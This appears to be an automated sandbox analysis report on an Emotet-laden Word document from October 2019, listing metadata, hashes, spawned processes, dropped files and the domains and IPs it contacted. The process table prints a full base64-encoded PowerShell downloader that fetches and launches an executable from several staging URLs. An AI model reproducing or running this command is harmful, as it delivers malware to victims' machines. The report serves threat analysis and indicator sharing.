download: | cxDXknmMpgJCGLrsXOHGoicZqWSiwT |
Full analysis: | https://app.any.run/tasks/861a4edb-e37e-45e5-aa99-ddda86d1bce3 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 16:20:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: District, Subject: Concrete, Author: Ronaldo Lesch, Keywords: Generic Frozen Sausages, Comments: dynamic, Template: Normal.dotm, Last Saved By: Julian O'Hara, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0 |
MD5: | 9A5C30659769BF56AD47E64D0CA8CC5E |
SHA1: | 87DC6521CDA53A51E56D5A342EEB5D8B6BDAE681 |
SHA256: | B6871D4B11C590E2656233A18DEC9FB376931E7FA8B6892DCFF3981D8CA02FEF |
SSDEEP: | 3072:keGRyYhKgdzSrGtKyIwLx357JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:keGRyYhKUzSSnLx3PzOYVHs2f |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Abernathy |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 196 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Lebsack - Corkery |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 168 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:10:09 12:18:00 |
CreateDate: | 2019:10:09 12:18:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Julian O'Hara |
Template: | Normal.dotm |
Comments: | dynamic |
Keywords: | Generic Frozen Sausages |
Author: | Ronaldo Lesch |
Subject: | Concrete |
Title: | District |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1100 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\cxDXknmMpgJCGLrsXOHGoicZqWSiwT.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3116 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1020 | "C:\Users\admin\178.exe" | C:\Users\admin\178.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
3172 | --3a2e7ef0 | C:\Users\admin\178.exe | — | 178.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR61F1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3116 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VWAFV8CCZCDXG7F0VMPL.temp | — | |
MD5:— | SHA256:— | |||
1100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C76EA8A0.wmf | wmf | |
MD5:D43DC28CB368D54CDDE95AEFEDA0A3A9 | SHA256:E353CA14A2C725E8FC51F217FC8039330A83792C6F774C4DB16D8A95108C3993 | |||
1100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33F658DA.wmf | wmf | |
MD5:F8C3BF7DA67F2CBD7011C98FEE71AB7A | SHA256:0244D23D6BC059B24B98DFCBFCB3D01554144579C9985218D5A78FCD4E7DEE3B | |||
3116 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A272B20D1454EFE23A324E582F0E701D | SHA256:68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 | |||
1100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A56C742.wmf | wmf | |
MD5:D474E5CF62153931C66DB07458F115F6 | SHA256:B5A34503EBD239F75701532198A9683A77D093AA1F6A13AD2330DC5E5C175853 | |||
1100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBF78414.wmf | wmf | |
MD5:61238F238BEFD798E22CA5C3877AB6EF | SHA256:3B0CB712B5A342E6A78C5D216FF7274A269D3A8FB572B196E8F0D7207BF60953 | |||
1100 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:830A9B698D859457D93E335CFC466EC2 | SHA256:32F2B1E926E6EE827ECD6F092DD412D2E7833458EE160C02CF6DF9E21F292591 | |||
1100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:2129AA99FE2A6AA214E5E01C7D6EE62E | SHA256:86F890255D219BC52CF0D06B9E6E112B26D9C87B9F6B9CFB9881A49FC38111A2 | |||
1100 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFC037AE.wmf | wmf | |
MD5:648C1A779E40D9476B0C972B5BCCF562 | SHA256:613B664727AFFD01AF8745CDC6EFB8E4A11F9F81A84D5FB47E5B2345053D660E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3116 | powershell.exe | GET | 403 | 146.88.234.116:80 | http://stephporn.com/cgi-bin/oSWSyiKNzf/ | FR | html | 318 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3116 | powershell.exe | 146.88.234.116:80 | stephporn.com | PlanetHoster | FR | suspicious |
3116 | powershell.exe | 43.255.154.26:443 | thehopeherbal.com | GoDaddy.com, LLC | SG | suspicious |
3116 | powershell.exe | 35.238.93.185:443 | e-centricity.com | — | US | unknown |
3116 | powershell.exe | 166.62.103.202:443 | newagesl.com | GoDaddy.com, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
stephporn.com |
| suspicious |
thehopeherbal.com |
| suspicious |
e-centricity.com |
| malicious |
newagesl.com |
| suspicious |